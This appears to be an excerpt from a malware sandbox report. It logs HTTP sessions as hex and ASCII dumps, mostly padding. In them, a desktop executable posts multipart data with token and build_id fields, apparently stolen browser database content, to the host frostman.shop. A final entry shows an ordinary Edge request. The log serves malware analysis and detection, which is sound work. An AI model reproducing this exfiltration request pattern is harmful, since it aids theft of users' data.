                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:44 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                45192.168.2.649917116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----5PZCTRI58YM7QQ1N7GVK
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 393697
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 52 49 35 38 59 4d 37 51 51 31 4e 37 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 52 49 35 38 59 4d 37 51 51 31 4e 37 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 52 49 35 38 59 4d 37 51 51 31 4e 37 47 56 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------5PZCTRI58YM7QQ1N7GVKContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------5PZCTRI58YM7QQ1N7GVKContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------5PZCTRI58YM7QQ1N7GVKCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:46 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                46192.168.2.64991123.209.72.434432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:46 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: assets.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
